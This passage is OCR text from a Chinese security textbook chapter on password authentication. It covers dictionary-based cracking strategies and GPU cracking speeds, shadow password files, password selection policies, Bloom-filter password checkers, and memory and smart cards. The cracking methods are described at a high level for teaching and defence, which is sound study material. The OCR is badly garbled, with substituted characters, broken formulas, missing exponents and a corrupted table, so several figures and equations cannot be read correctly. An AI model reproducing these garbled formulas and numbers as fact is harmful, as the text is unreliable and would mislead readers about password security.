而 容易 猜测 的 口令 。 一 个 特别 的 问题 就 是 ， 当 用 户 被 许可 选择 自己 的 口令 时 ， 会 选择 简短 的 口 
令 。[BONN12] 总 结 了 过 去 几 年 对 超过 4000 万 被 破译 的 口令 的 若干 研究 结果 ， 并 对 几乎 7000 
万 个 Yahoo! 用 户 的 匿名 口令 进行 分 析 ， 发 现 用 户 喜 欢 用 6 到 8 个 字符 长 度 的 口令 且 非 常 不 嘉 
欢 在 口令 中 使 用 非 字 母 数字 字符 。 

[BONN12] 中 对 7000 万 口令 的 分 析 估计 出 ， 口 令 对 在 线 漫 步 攻击 提供 少 于 10 比特 的 安全 
性 ， 对 最 优 离线 字典 攻击 提供 20 比特 的 安全 性 。 换 句 话 说， 如果 攻击 者 对 每 个 账户 可 以 控制 
10 次 猜测 (通常 在 速率 限制 机 制 的 范围 之 内 )， 那 么 他 将 破解 大 约 1% 的 账户 ， 就 如 同 应 对 随 
机 10 比特 字符 串 一 样 。 要 想 阻 止 一 个 最 优 的 黑客 采用 无 限制 暴力 破解 一 半 的 账户 ， 口 令 似 乎 
大 致 等 同 于 20 比特 随机 字符 串 。 而 即便 采用 了 大 量 的 迭代 哈 希 ， 使 用 离线 搜索 也 能 让 一 个 敌 
手 破解 大 量 账户 。 

口令 的 长 度 只 是 一 个 方面 。 当 系统 允许 用 户 设置 口令 时 ,很 多 人 可 能 会 选择 一 个 容易 被 
猜测 的 口令 ， 比 如 用 户 名 字 、 街 道 名 字 、 字 典 中 的 常用 词汇 等 。 这 使 得 口令 的 破解 更 加 简单 直 
接 ， 破 解 者 只 需要 党 试 这 些 可 能 的 字符 串 就 可 以 完成 破解 。 由 于 很 多 人 都 使 用 这 种 容易 猜测 到 
的 口令 ， 使 得 这 种 策略 在 所 有 的 实际 系统 上 都 可 以 成 功 。 

[KLEI90] 的 一 份 报告 显示 了 这 种 猜测 攻击 的 有 效 性 。 和 研究 者 从 很 多 种 数据 源 中 收集 了 
UNIX 口令 文件 ， 其 中 包括 近 14 000 个 经 过 加 密 的 口令 。 对 于 这 份 结果 ， 研 究 者 认为 其 很 惊 
人 。 在 所 有 的 口令 中 ， 接 近 四 分 之 一 的 口令 是 可 以 被 成 功 猪 测 出 来 的 。 下 面 列 出 了 口令 破解 所 
使 用 的 策略 : 

1. 尝试 用 户 的 名 字 、 姓 名 缩写 、 账 户 名 以 及 其 他 的 个 人 相关 信息 。 对 于 每 一 个 用 户 总 共有 
130 种 不 同 的 组 合用 于 破解 尝试 。 

2. 尝试 使 用 不 同 字典 中 出 现 的 词汇 。 研 究 者 编辑 了 一 本 超过 60 000 个 词汇 的 字典 ， 包 括 
系统 自 带 的 在 线 字典 以 及 其 他 一 些 词汇 列表 。 

3. 根据 对 第 2 步 中 的 词汇 进行 排列 来 尝试 破解 ， 包 括 把 词汇 的 第 一 个 字母 大 写 或 添加 控制 
符 ， 把 所 有 的 字符 都 大 写 ， 反 写 单词 ， 把 字母 “o” 变 成 数字 “0”， 等 等 。 这 些 排 列 将 为 口令 
词汇 列表 新 增加 100 万 个 词汇 。 

4. 对 来 自 第 2 步 且 在 第 3 步 中 未 予 考虑 的 词汇 尝试 各 种 大 写 置换 。 这 样 将 为 口令 词汇 列表 
增加 大 约 200 万 个 词汇 。 

这 样 ， 大 约 要 对 近 300 万 个 词汇 进行 测试 。 使 用 最 快速 的 处 理 器 ， 通 过 所 有 可 能 的 “ 盐 
值 ”来 加 密 所 有 的 这 些 词汇 ， 时 间 不 会 超过 一 个 小 时 。 要 注意 ， 虽然 这 样 的 枚 举 搜索 可 能 只 会 
有 25% 的 成 功率 ， 但 是 很 可 能 只 要 猜 中 一 个 口令 就 会 得 到 系统 的 足够 大 的 权限 。 

蛮 力 破解 和 字典 技术 结合 使 用 的 攻击 方法 已 被 广泛 认可 。 开 源 口令 破解 器 John the 
Ripper[OPEN13] 是 一 个 值得 注意 的 例子 ， 它 开发 于 1996 年 并 沿用 至 今 。 

现代 方法 At, 口令 的 脆弱 性 在 过 去 的 25 年 里 并 未 发 人 深 省 。 鉴 于 复杂 口令 策略 ， 相 
比 之 前 ， 用 户 在 设置 口令 方面 做 得 很 好 ， 同 时 组 织 在 提醒 用 户 方面 也 做 得 很 好 。 尽 管 如 此 ， 
口令 破解 技术 也 在 与 时 俱 进 。 破 解 技术 的 革新 主要 在 两 个 方面 。 首 先 ， 用 于 口令 破解 技术 的 处 
理性 能 有 了 显著 的 提高 。 如 今 ， 随 着 计算 速度 的 提升 ， 在 同样 价格 的 PC 上 ， 图 形 处 理 器 执行 
口令 破解 程序 的 速度 比 十 年 前 单 核 处 理 器 快 了 近 千 倍 。 举 例 来 说 ， 利 用 [GOOD12a] 中 的 算法 ， 
一 台 搭 载 单个 AMD Radeon HD7970 GPU 的 PC 能 够 平均 每 秒 尝试 8.2X 10 种 口令 组 合 。 仅 仅 
在 十 年 前 ， 想 实现 如 此 的 运算 速度 只 能 使 用 昂贵 的 超级 计算 机 。 
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第 二 ， 近 年 来 出 现 了 更 多 被 用 于 生成 潜在 口令 的 成 熟 算 法 。 例 如 ，[NARA05] 提出 了 一 个 
口令 生成 模型 ， 它 利用 自然 语言 中 字母 出 现 的 概率 。 研 究 者 使 用 自然 语言 处 理 中 的 标准 马尔 可 
夫 模型 显著 地 减少 了 口令 空间 的 大 小 。 

然而 ， 通 过 分 析 实 际 应 用 中 的 口令 样本 ， 已 经 得 出 了 最 佳 的 结果 。 为 了 发 展 比 亦 力 破解 和 
字典 攻击 更 高 效 的 技术 ， 研 究 者 和 黑客 深入 分 析 了 口令 的 构成 。 而 且 ， 分 析 人 士 需要 大 量 的 当 
前 应 用 中 的 真实 口令 。 第 一 个 重大 突破 出 现在 2009 年 之 后 ， 某 次 大 规模 的 SQL 注入 攻击 致使 
bX UF AR 4% RockYou.com 的 3200 万 个 用 户 登 录 口 令 明 文 被 泄露 [TIMM10]。 自 此 之 后 ,被 港 
露 的 数 以 万 计 的 口令 文件 得 以 被 分 析 人 士 利用 。 

通过 使 用 大 量 被 泄露 的 口令 作为 训练 数据 ，[WEIR09] 报告 了 基于 概率 的 上 下 文 无 关 文 
法 。 在 报告 所 提 及 的 方法 中 ， 猜 测 的 顺序 由 猜测 的 可 能 性 决定 ， 包 括 字符 类 结构 在 训练 集中 的 
出 现 频率 ， 以 及 数字 和 符号 子 串 的 出 现 频率 。 在 口令 破解 中 ， 该 方法 已 被 证 实 有 效 [KELL12， 
ZHAN10]。 

[MAZU13] 给 出 了 一 个 口令 分 析 结 果 报 告 ， 该 分 析 中 涉及 的 口令 为 某 研究 性 大 学 中 25 000 名 
学 生 所 使 用 ， 且 这 些 口令 均 由 复杂 口令 策略 产生 。 分 析 人 士 使 用 了 [WEIR09] 中 的 口令 破解 方 
法 ， 他 们 使 用 的 数据 集 包 括 一 些 泄露 的 口令 文件 (如 RockYou 文件 )。 图 3-4 总 结 了 论文 中 主要 
的 分 析 结 果 。 图 表 显 示 了 被 破译 口令 的 百分比 与 猜测 总 数 的 函数 关系 。 正 如 我 们 看 到 的 ， 在 仅 
{X 10" 次 猜测 后 ， 超 过 10% 的 口令 被 破译 。 而 经 过 10" 次 猜测 ， 几 乎 40% 的 口令 被 破译 。 
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图 3-4 一 定 次 数 猜测 后 被 猜 中 口令 的 百分比 


3.24 口令 文件 访问 控制 


一 种 阻止 口令 攻击 的 方法 就 是 拒绝 对 手 访 问 口令 文件 。 如 果 文 件 的 散 列 口令 部 分 只 能 被 特 
权 用 户 访 问 ， 那 么 对 手 就 不 能 够 读 取 口令 文件 ， 除 非 他 拥有 特权 用 户 的 口令 。 通 常 ， 散 列 后 的 
口令 保存 在 与 用 户 ID 分 离 的 单独 文件 中 ， 这 个 文件 叫 作 影子 口令 文件 (shadow password file). 
对 于 影子 口令 文件 ， 需 要 特别 注意 保护 ， 防 止 非 授 权 访问 。 尽 管 对 口令 文件 的 保护 工作 已 经 做 
了 很 多 ， 但 是 仍然 有 以 下 不 足 : 
e 很 多 系统 ， 包 括 大 多 数 的 UNIX 系统， 都 有 被 人 侵 的 可 能 。 黑 客 可 以 利用 操作 系统 中 
软件 的 漏洞 绕 过 操作 系统 的 访问 控制 来 获取 口令 文件 。 此 外 ,文件 系统 的 漏洞 以 及 数 
据 库 管 理 系统 的 漏洞 也 可 以 使 黑客 能 够 对 口令 文件 进行 访问 。 
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e 某 些 偶然 事件 会 导致 口令 文件 可 读 ， 因 此 会 危及 所 有 账户 的 安全 。 

o 某 些 用 户 在 其 他 安全 保护 域 的 其 他 机 器 上 上 有 具有 账户 ， 并 且 使 用 相同 的 口令 。 因 此 ， 只 
要 其 中 一 个 系统 的 用 户口 令 被 读 取 ， 那 么 其 他 系统 上 的 账户 的 安全 也 会 受到 威胁 。 

e 物理 安全 性 的 缺乏 可 能 会 给 黑客 提供 可 乘 之 机 。 有 时 人 们 会 将 口令 文件 备份 到 紧急 修 
复 磁盘 或 存档 磁盘 ， 攻 击 者 访问 该 备份 就 能 读 取 口令 文件 。 此 外 ， 用 户 可 以 从 运行 男 
一 个 操作 系统 (如 Linux) 的 磁盘 启动 ， 来 访问 这 个 操作 系统 中 的 文件 。 

© 除了 获取 系统 口令 文件 之 外 ， 男 外 一 种 方法 就 是 对 网 络 通 信和 包 进 行 监听 来 收集 用 户 ID 
和 口令 。 

因此 ， 口 令 保护 策略 必须 要 补充 到 访问 控制 方法 中 ， 以 强制 用 户 选 择 那 些 不 容易 被 破解 的 口令 - 


3.2.5 口令 选择 策略 


在 没有 限制 的 情况 下 ， 多 数 用 户 选 择 的 口令 不 是 太 短 就 是 太 容 易 被 猜 到 。 在 男 外 一 种 极端 
的 情况 下 ， 如 果 为 用 户 设置 由 8 个 随机 选择 的 字符 组 成 的 口令 ， 那 么 该 口令 可 以 说 是 很 难 被 破 
解 的 。 但 是 ， 这 可 能 导致 大 多 数 用 户 根本 记 不 住 他 们 所 设置 的 口令 。 笠 运 的 是 ， 即 使 我 们 限制 
口令 的 样本 的 总 体 是 那些 容易 记 住 的 字符 串 ， 但 是 庞大 的 口令 样本 也 会 使 口令 的 破解 变 得 不 可 
行 。 我 们 制定 口令 选择 策略 的 目标 ， 是 不 仅 要 使 口令 变 得 不 容易 破解 ， 而 且 要 人 允许 用 户 选 择 容 
易 记 忆 的 口令 。 为 了 实现 这 个 目标 ， 目 前 正在 使 用 下 面 四 种 基本 方法 : 

e 用 户 教育 (user education) 

e 计算 机 生成 口令 (computer-generated password) 

e 后 验 口令 检查 (reactive password checking ) 

e 先 验 口 令 检 查 (proactive password checking) 

应 该 告知 用 户 选 择 使 用 难以 被 破解 的 口令 的 重要 性 ， 同 时 应 该 给 用 户 提供 一 些 具体 的 选择 
这 类 强 口令 的 指导 原则 。 这 种 用 户 教育 策略 在 很 多 时 候 是 无 效 的 ， 特 别 是 在 用 户 数量 众多 或 者 
人 员 流 动 较 大 的 情况 下 ， 很 多 用 户 可 能 会 忽视 系统 给 出 的 提示 。 另 外 一 些 用 户 也 可 能 不 知道 如 
何 判断 一 个 口令 是 难 破解 的 。 例 如 ， 很 多 用 户 会 错误 地 认为 把 词汇 反 写 或 者 把 最 后 一 个 字母 大 
写 就 会 得 到 一 个 不 可 破解 的 口令 。 

尽管 如 此 ， 在 设置 口令 时 系统 给 用 户 以 指导 仍然 是 很 有 意义 的 。 可 能 最 好 的 方法 就 是 遵 
从 以 下 建议 : 使 用 一 个 短语 的 每 个 单词 的 首 字母 作为 口令 。 但 是 不 要 选择 像 “ an apple a day 
keeps the doctor away”( Aaadktda) 一 类 众所周知 的 短语 。 相 反 ， 应 该 选择 此 类 短语 ， 如 “My 
dog’s first name is Rex” (MdfniR) 或 者 “My sister Peg is 24 years old” ( MsPi24yo)。 人 研究 表明 ， 
用 户 更 容易 记 住 此 类 口令 ， 而 攻击 者 却 不 容易 破解 此 类 口令 。 

使 用 计算 机 生成 口令 同样 存在 问题 。 如 果 计 算 机 生成 的 口令 是 非常 随机 的 ， 则 会 导致 用 户 
难于 记忆 。 即 使 这 些 口 令 是 可 以 拼 读 的 , 但 用 户 记 忆 口 令 仍然 会 有 困难 ， 因 而 其 更 倾向 于 把 口 
令 写 下 来 。 总 的 来 说 ,计算机 产生 口令 的 策略 是 不 容易 被 用 户 所 接受 的 。FIPS 181 定义 了 一 种 
设计 很 好 (best-designed) 的 口令 上 自动 生成 器 。 这 个 标准 不 仅 包 括 了 设计 方法 的 描述 ， 而 且 给 
出 了 这 个 算法 的 完整 C 语言 源 代码 。 这 个 算法 通过 形成 可 拼 读 的 音节 并 把 它们 连接 起 来 组 成 
单词 。 通 过 一 个 随机 数 发 生 需 生成 一 个 随机 的 字符 流 ， 并 以 此 来 构建 音节 和 单词 。 

后 验 口令 检查 策略 就 是 系统 周期 性 地 运行 自己 的 口令 破解 程序 来 找到 容易 被 猜测 到 的 口令 ， 
系统 将 会 取消 这 种 容易 被 破解 的 口令 ， 并 通知 相应 的 用 户 。 这 种 策略 仍然 存在 缺点 。 首 先 ， 由 于 
口令 破解 者 可 以 持续 几 个 小 时 甚至 几 天 使 用 他 的 全 部 CPU 资源 来 进行 口令 破解 。 然 而 ， 后 验 口 令 
检查 策略 的 资源 使 用 却 是 受 限 制 的 。 此 外 ， 一 个 容易 被 破解 的 口令 在 后 验 口令 检查 策略 发 现 它 
之 前 ， 将 一 直 处 于 容易 被 破解 的 状态 。 因 此 ， 如 果 有 用 户 设置 了 容易 被 破解 的 口令 ， 那么 在 后 
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验 口令 检查 找到 它 之 前 可 能 就 已 经 被 攻击 者 破解 了 。 应 用 这 种 策略 一 个 较 好 的 例子 就 是 开源 软 
件 Jack the Ripper 口令 检查 器 (openwall.com/john/pro/)， 它 可 以 在 很 多 不 同 的 操作 系统 中 工作 。 

目前 ， 最 被 认可 的 一 种 提高 口令 安全 的 方法 ， 是 采用 先 验 口令 检查 的 策略 。 在 这 种 策略 
中 ， 人 允许 用 户 选择 他 目 己 的 口令 ， 但 是 在 选择 过 程 中 系统 将 会 对 口令 进行 检查 ， 决 定 是 否 人 允许 
用 户 设置 该 口令 。 如 果 不 人 允许 设 置 ， 则 拒绝 其 选择 此 口令 。 在 系统 的 充分 提示 下 ， 用 户 可 以 从 
大 量 的 口令 空间 中 选择 那些 不 容易 被 破解 而 且 容 易 记 忆 的 口令 ， 这 样 就 很 可 能 避 开 通过 口令 字 
典 进行 的 口令 破解 的 攻击 。 

这 种 先 验 口令 检查 的 策略 需要 在 用 户 接受 程度 和 口令 的 设置 强度 上 做 出 平衡 。 如 果 系 统 拒绝 了 
过 多 用 户 设置 的 口令 ， 那 么 用 户 将 会 抱怨 这 种 口令 策略 缺乏 用 户 的 选择 空间 。 如 果 系 统 使 用 了 较 简 
单 的 口令 选择 算法 ， 使 它 变 得 容易 被 用 户 接受 ， 那 么 口令 强度 将 会 受到 影响 ， 这 也 会 为 口令 攻击 
者 改进 其 猜测 技术 提供 帮助 。 在 随后 的 内 容 中 ， 我 们 将 针对 先 验 口令 检查 提供 一 些 可 行 的 方法 。 

规则 实施 第 一 种 方法 是 构造 一 个 实施 规则 的 简单 系统 。 例 如 ，NIST SP 800-63-2 建议 使 
用 下 列 可 供 选 择 的 规则 : 

© 口令 必须 至 少 有 16 个 字符 (basic16 ) 。 

© 口令 必须 至 少 有 8 个 字符 ， 其 中 包括 一 个 大 写 和 小 写字 母 ， 一 个 符号 和 一 个 数字 ; 并 

且 不 能 包含 一 个 字典 中 的 单词 (comprehensive ) 。 

尽管 NIST 认为 basic16 和 comprehensive8 是 等 价 的 ， 但 [KELL12] 发 现 ，basic16 在 抵御 
大 量 猜 解 时 更 优 。 结 合 之 前 的 结果 ，basic16 更 易于 用 户 使 用 [KOMA11]， 这 表明 basic16 是 更 
好 的 策略 选择 。 

尽管 这 种 方法 比 简单 地 教育 用 户 更 优 ， 但 其 不 足以 阻止 口令 破解 。 这 个 方案 提醒 破解 者 有 
些 不 必 尝 试 的 口令 仍 有 可 能 导致 口令 破解 。 

实施 规则 可 以 在 先 验 口令 检查 过 程 中 自动 地 进行 。 例 如 ， 开 源 软件 pam_passwdqc (openwall. 
comy/passwdqc/)， 它 在 进行 口令 设置 时 ， 执 行 各 种 规则 ， 并 可 以 由 系统 管理 员 进 行 配置 。 

口令 检查 器 ” 另 一 个 可 行 的 方法 是 构造 一 个 由 不 能 作为 口令 选择 的 字符 串 组 成 的 “不 可 
行 ”口令 字典 。 当 用 户 在 选择 一 个 口令 时 ， 系 统 将 会 检查 这 个 口令 以 保证 其 不 出 现在 这 个 “不 
可 行 ” 口 令 字 典 中 。 但 是 这 种 方法 有 两 个 缺点 : 

e 空间 消耗 : 字典 必须 足够 大 才能 有 效 。 

o 时 间 消 耗 : 对 如 此 庞大 的 字典 进行 搜索 可 能 需要 相当 长 的 时 间 。 此 外 ， 为 了 检查 字典 

词汇 的 可 能 变换 ， 要么 将 这 些 词汇 包含 在 字典 中 ,使 得 口令 字典 变 得 更 加 庞大 。 要 人 么 
每 一 次 搜索 都 会 花费 相当 长 的 处 理 时 间 。 

Bloom 过 滤器 Spafford 提出 了 一 个 基于 Bloom 过 滤器 ( Bloom filter) [BLOO70] 的 方法 
[SPAF92a，SPAF92b]， 用 于 生成 高 效 的 后 验 口令 检查 器 ， 而 检查 器 是 通过 拒绝 使 用 在 一 些 系 
统 (40 Linux) 上 使 用 的 口令 列表 中 的 口令 而 实现 的 。 在 开始 介绍 这 个 过 滤 需 之 前 ， 我 们 将 首先 
解释 它 的 运行 原理 。 一 个 上 阶 的 Bloom 过 滤器 由 大 个 相互 独立 的 散 列 函数 A(x), A(x), +++, A(x) 
组 成 ， 每 一 个 散 列 函数 将 口令 映射 为 一 个 范围 在 O~(N—-1) 之 间 的 散 列 值 。 即 

H(X)=y (Sik: TD, VENA 
其 中 

eX ANOS STH PHD J MAIL; 

e DD 表示 口令 字典 中 的 词汇 数量 。 

依据 以 下 操作 步骤 生成 口令 字典 : 

1. 定义 一 个 入 位 的 散 列表 ， 所 有 位 的 初始 值 都 设置 为 0。 

2. 对 于 每 一 个 口令 ,计算 它 的 个 散 列 值 ， 并 且 把 散 列 表 中 对 应 的 位 置 设置 为 1!。 因 此 ， 
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如 果 对 于 某 个 (i, j))，Hi(%%)= 二 67， 那 么 散 列 表 中 的 第 67 位 上 的 数值 将 被 设置 为 1 ; 如 果 该 位 已 
经 为 1， 那么 仍然 保持 该 位 为 1 不 变 。 
当 口 令 检 测 右 收 到 一 个 新 的 口令 时 ， 检 测 右 将 计算 该 口令 的 个 散 列 值 。 如 果 散 列表 中 所 有 
的 对 应 位 的 值 都 是 1， 那 么 这 个 口令 将 会 被 弃 用 。 易 猜测 口令 字典 中 出 现 的 所 有 口令 都 将 被 拒绝 使 
用 。 但 是 ， 某 些 没 有 在 易 猜 测 口令 字典 中 出 现 的 口令 也 可 能 在 散 列 表 中 产生 匹配 ， 这 种 情况 被 称 
为 “ 误 判 ” 。 为 了 便于 理解 这 个 问题 ， 可 以 考虑 使 用 两 个 散 列 函 数 的 方案 。 假 设 口 令 undertaker 
和 hulkhogan 在 口令 字典 中 ， 口 令 xG%ejj98 不 在 字典 中 。 进 一 步 假设 有 如 下 计算 结果 : 
Hi(undertaker)=25 H,(hulkhogan) = 83 H,(xG%#jj98) = 665 
H(undertaker) = 998 H,(hulkhogan)= 665 Hy(xGV%#}j98) = 998 
如 果 将 口令 xG% 榴 j98 提交 给 系统 ， 那 么 即使 这 个 口令 并 没有 在 易 猜 测 口令 字典 中 出 现 ， 
也 将 会 被 弃 用 。 如 果 存 在 很 多 类 似 的 误 判 情况 ， 那 么 用 户 在 选择 口令 时 就 会 很 困难 。 因 此 ， 应 
该 设计 一 种 使 “ 误 判 ”的 情况 最 少 的 散 列 方案 。“ 误 判 ” 的 概率 可 以 使 用 以 下 公式 近似 表示 : 
Px (1 = "ii (1 = gy 
或 者 ， 等 价 地 表示 为 


petar 
In(1—P'*) 


其 中 

k 表 示 散 列 函数 的 数量 ; 

N 表示 散 列表 的 位 数 ; 

D 表示 口令 字典 的 口令 数量 ; 

© RR 表示 ND， 是 散 列表 规模 (位 ) 和 字典 规模 ( 词 ) 的 比值 。 

图 3-5 绘制 对 于 不 同 k 值 的 R 的 函数 P。 假设 口令 字典 中 有 一 百 万 个 口令 ， 并且 我 们 希 
FAVA 0.01 的 误 判 率 来 拒绝 用 户 选 择 的 不 包含 在 口令 字典 中 的 口令 。 从 图 中 可 以 看 到 ， 如 果 选 
择 6 个 散 列 函数 ， 需 要 的 比值 是 R=9.6。 因 此 ， 需 要 一 个 9.6X10 位 的 散 列表 或 者 说 需要 
1.2MB 的 散 列 表 存 储 空间 。 相 反 ， 存 储 整 个 口令 字典 要 求 有 8MB 的 存储 空间 。 相 比 之 下 ， 采 用 
这 种 方法 在 存储 空间 上 压缩 了 近 1/7。 此 外 ， 该 方法 中 口令 的 检查 只 需要 计算 6 个 散 列 函数 ， 这 
与 字典 的 大 小 无 关 。 然 而 ， 如 果 使 用 全 部 的 口令 字典 会 使 搜索 的 工作 量变 得 很 大 。9 
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© Bloom 过 滤器 应 用 了 概率 统计 技术 ， 不 在 口令 字典 中 的 口令 被 拒绝 的 概率 是 很 小 的 。 因 此 ， 经 常 出 现 这 些 
情况 ,在 采用 概率 技术 进行 算法 设计 时 ， 求 解 时 间 较 少 或 者 求解 过 程 比较 简单 ， 或 者 两 种 情况 兼 有 。 


3.3 ”基于 令 牌 的 认证 


令 牌 就 是 用 户 持 有 的 用 于 进行 用 户 认证 的 一 种 物品 。 本 节 中 ， 我 们 将 介绍 两 种 应 用 最 广泛 
的 令 牌 ， 它 们 有 和 银行 卡 相似 的 大 小 和 外 形 ( 见 表 3-3). 


表 3-3 用 作 令 牌 的 卡 的 类 型 


EEE za 
HE “RAS IE Ta 49 1h EV AEF 老式 信用 卡 

磁 条 卡 卡 的 背面 有 磁 条 ， 正 面 有 字符 银行 卡 

存储 卡 卡 的 内 部 有 电子 存储 单元 预付 电话 卡 
智能 卡 卡 内 有 电子 存储 单元 和 处 理 器 

接触 式 表面 有 电子 触 点 生物 特征 ID 卡 
非 接触 式 内 部 般 有 无 线 电 通信 装置 





3.3.1 存储 卡 


存储 卡 只 能 存 取 数 据 而 不 能 处 理 数据 。 这 类 卡 最 常见 的 就 是 银行 卡 ， 在 卡 的 背面 有 磁 条 。 
这 个 磁 条 可 以 存储 一 些 简 单 的 安全 码 ， 磁 卡 可 以 通过 一 种 价格 并 不 昂贵 的 读 卡 器 读 取 。 此 类 存 
储 卡 的 内 部 含有 一 个 电子 存储 髓 。 
存储 卡 可 以 单独 用 于 物理 访问 ， 例 如 旅馆 房间 的 门禁 系统 。 对 于 计算 机 用 户 认证 ， 这 种 卡 
通常 需要 用 户 输 入 某 种 形式 的 口令 或 者 个 人 标识 码 (PIN)。 存 储 卡 的 一 种 典型 应 用 就 是 自动 柜 
员 机 ( ATM)。 由 于 必须 同时 拥有 存储 卡 和 PIN， 组 合 使 用 口令 和 PIN 的 存储 卡 提 供 的 安全 性 
远 高 于 单独 使 用 口令 的 安全 性 。 敌 手 必须 实际 持 有 该 卡 (或 者 能 复制 它 )， 还 必须 获得 有 关 PIN 
的 知识 。NIST SP 800-12 (计算 机 安全 入 门 : NIST 手 册 ，1995 年 10 H) 指出 存储 卡 可 能 存在 
的 缺陷 如 下 : 
e 需要 特殊 的 读 卡 器 : 读 卡 如 需要 软件 和 硬件 来 支持 安全 性 ， 这 提高 了 令 脾 认证 方法 的 
成 本 。 82 | 
e CRER: 令 牌 的 丢失 会 使 得 用 户 暂时 不 能 进入 系统 。 补 办 丢失 的 令 牌 ， 会 增加 管理 
的 成 本 。 此 外 ， 如 果 令 牌 被 偷窃 或 者 被 伪造 ， 那 么 敌手 只 需要 获取 PIN 就 可 以 执行 非 
授权 的 访问 。 
e 用 户 不 满意 : 虽然 用 户 对 于 ATM 存储 卡 的 使 用 没有 意见 ， 但 是 把 存储 卡 应 用 在 计算 机 
系统 中 ， 肯 定 是 不 方便 的 。 


3.3.2 智能卡 


很 多 设备 都 可 以 被 称 为 智能 令 牌 ， 可 以 从 四 个 方面 对 它们 进行 分 类 ， 而 这 些 分 类 并 不 是 互 斥 的 : 
o 物理 特征 : 智能 令 牌 包括 一 个 谋 入 的 微 处 理 器 。 其 外 表 类 似 于 银行 卡 ， 因 此 称 其 为 智 
能 卡 。 其 他 的 一 些 智 能 令 牌 的 外 表 有 的 类 似 于 计算 器 ， 有 的 类 似 于 钥 古 或 其 他 便携 式 
物品 。 
e 用 户 接 口 : 人 机 接口 包括 一 个 键盘 区 和 显示 设备 ， 以 完成 人 机 交互 。 
e 电子 接口 : 智能 卡 或 其 他 令 牌 通常 需要 配 一 个 电子 接口 ， 用 于 与 读 取 或 写 和 人 装置 通信 。 
一 张 卡 可 能 含有 下 述 两 种 或 其 中 一 种 接口 : 
m 接触 式 〈 contact) : 使 用 接触 式 智能 卡 时 ， 智 能 卡 必须 被 插入 智能 卡 读 取 融 中 ， 通 过 
卡 表面 的 导电 接触 板 (通常 是 金属 板 ) 与 读 取 需 直接 接触 。 指 令 、 数 据 和 状态 信息 
的 传输 发 生 在 这 些 物理 接触 点 上 。 
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m 非 接触 式 〈contactless) : 使 用 非 接触 式 智能 卡 时 ， 智 能 卡 只 需要 接近 读 取 器 。 智 能 
卡 和 读 取 器 均 载 有 天 线装 置 ， 两 者 通过 无 线 频率 进行 交互 。 男 外 ， 大 多 数 非 接触 式 
智能 卡通 过 该 电磁 信号 为 其 内 置 芯片 提供 电能 。 对 于 非 电池 供电 卡 ， 其 接近 距离 一 
般 为 1.5 一 3 英寸 (1 英寸 =0.02$4 米 )， 且 这 类 卡通 常 被 应 用 于 建筑 物 门禁 或 者 快 
捷 文 付 等 方面 。 
e 认证 协议 : 使 用 智能 令 牌 的 目的 就 是 提供 用 户 认 证 方法 。 我 们 可 以 按照 认证 协议 把 智 
能 令 牌 划分 为 三 类 : 
m 静态 协议 (static): 使 用 静态 协议 时 ， 用 户 首 先 完 成 自己 对 令 牌 的 认证 ， 之 后 令 牌 完 
成 计算 机 对 用 户 的 认证 。 静 态 协 议 的 后 半 部 分 类 似 于 存储 令 牌 的 操作 。 
e 动态 口令 生成 器 (dynamic password generator): 在 这 种 情况 下 ， 每 隔 一 段 时 间 (比如 
每 分 钟 ) 令 牌 就 会 产生 一 个 口令 ， 之 后 这 个 口令 就 会 被 计算 机 和 令 牌 用 于 认证 ， 可 
以 是 用 户 手工 进行 ， 也 可 以 通过 令 牌 自动 进行 。 计 算 机 和 令 牌 必须 被 初始 化 并 保持 
同步 ， 从 而 使 得 计算 机 知道 当前 令 牌 使 用 的 口令 。 
m 挑战 -应答 协议 〈challenge-response) : 在 这 种 情况 下 ， 计 算 机 系统 产生 一 个 挑战 信 
号 ， 比 如 一 个 随机 的 数字 串 。 智 能 令 牌 将 会 产生 一 个 基于 这 个 挑战 信号 的 应 答 信 和 号 
例如 ， 在 公 钥 加 密 机 制 中 ， 令 牌 可 以 使 用 私 钥 对 挑战 串 进 行 加 密 。 
在 计算 机 的 用 户 认证 方面 ， 最 重要 的 智能 令 牌 种 类 就 是 智能 卡 ， 它 的 外 形 和 信用 卡 一 样 ， 
拥有 电子 接口 ， 并 且 可 以 使 用 刚才 所 描述 的 任何 类 型 的 协议 。 接 下 来 ， 我 们 继续 讨论 智能 卡 。 
智能 卡 包 含 一 个 完整 的 微 处 理 堪 ， 由 处 理 器 、 内 存 、 输 入 /输出 端口 组 成 。 某 些 版 本 的 智 
能 卡 集 成 有 进行 密码 运算 的 协 处 理 电路 ， 以 加 速 对 消息 进行 编码 和 解码 或 者 产生 数字 签名 来 验 
证 传输 数据 有 效 性 的 工作 。 在 某 些 卡 中 ， 对 LO 端口 的 访问 是 可 兼容 读 卡 器 通过 暴露 式 电子 接 
触 的 方法 来 直接 完成 的 ; 另外 一 些 卡 则 使 用 钱 入 的 天 线 完成 与 读 卡 器 的 无 线 通 信 。 
一 个 典型 的 智能 卡 包 括 三 种 存储 器 。 只 读 存 储 器 (ROM) 存储 的 数据 在 整个 智能 卡 的 生 
命 周 期 内 都 不 会 发 生变 化 ， 如 存储 卡 的 序列 号 以 及 持 卡 人 的 姓名 。 电 子 可 擦 写 可 编程 存储 器 
(EEPROM) 存储 应 用 程序 和 数据 ， 例 如 智能 卡 所 执行 的 协议 。 这 种 存储 器 也 存储 可 能 会 随时 
改变 的 数据 ， 例 如 在 电话 卡 中 ，EEPROM 存储 剩余 的 通 ' 
话 时 间 。 随 机 存 取 存 储 器 (RAM) 则 保存 应 用 程序 执行 时 
产生 的 临时 数据 。 
图 3-6 显示 了 智能 卡 与 读 卡 胡 或 计算 机 系统 的 典型 交 
互 模式 。 每 次 在 智能 卡 插 人 到 读 卡 器 时 ， 读 卡 需 都 会 产生 
一 个 复位 〈reset) 信号 以 对 参数 进行 初始 化 ， 例 如 时 钟 的 
值 。 在 完成 复位 功能 后 ， 智 能 卡 将 会 有 一 个 应 答 来 啊 应 复 








位 (ATR) 消息 。 这 个 响应 消息 定义 了 智能 卡 能 使 用 的 参 。 ”一 7S 交 沙 协议。 
数 和 协议 及 其 所 执行 的 功能 。 计 算 机 终端 可 以 通过 协议 类 PTS 交 涉 应 管 
型 选择 (PTS) 命令 来 改变 使 用 的 协议 和 其 他 的 参数 。 智 命令 APDU 


响应 APDU 


能 卡 根据 PTS 响应 信号 来 确认 使 用 的 协议 和 参数 。 至 此 ， C 
终端 和 智能 卡 就 可 以 执行 应 用 程序 了 。 


3.3.3 ”电子 身份 证 


在 智能 卡 的 诸多 应 用 中 ， 有 -一 项 应 用 正 变 得 越 来 越 。。APDU 应 用 协议 提交 
对 复位 信 生 的 应 答 
